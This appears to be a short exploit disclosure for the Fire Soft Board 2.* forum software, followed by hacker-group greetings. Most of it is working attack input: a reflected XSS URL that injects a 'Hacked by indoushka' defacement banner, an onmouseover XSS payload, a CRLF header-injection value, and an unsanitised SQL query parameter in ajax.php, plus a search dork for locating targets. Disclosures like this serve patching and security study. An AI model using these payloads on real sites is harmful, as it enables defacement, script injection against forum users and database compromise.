| # Title : Forum Fire Soft Board 2.* Multi Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Dork : Forum Fire-Soft-Board © 2004 - 2014 | # Tested on: windows 8.1 Français V.(Pro) | # Bug : Multi | # Download : http://www.fire-soft-board.com ======================================= ( XSS / HTML Inject ) : http://localhost//fsb/index.php?direction=DESC&g_id=2&like=begin%22%20%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E%3d%22&limit=30&module=2&order=u_total_post&p=userlist&page=1&search_user= CRLF injection/HTTP response splitting : This vulnerability affects /fsb/index.php. Attack details : URL encoded POST input jumpbox was set to SomeCustomInjectedHeader:pentst_test Injected header found: SomeCustomInjectedHeader: pentst_test Cross site scripting (verified) : This vulnerability affects /fsb/index.php. Attack details : URL encoded GET input like was set to begin" onmouseover=prompt(928030) bad=" The input is reflected inside a tag parameter between double quotes. Sql : C:\AppServ\www\fsb\ajax.php line : 438 mysqli::query $sql C:\AppServ\www\fsb\sdk.php Line : 317 mysqli::query $sql http://localhost//fsb/ajax.php?sql= <=== inject her Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ======================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/ www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net ---------------------------------------------------------------------------------------------------------------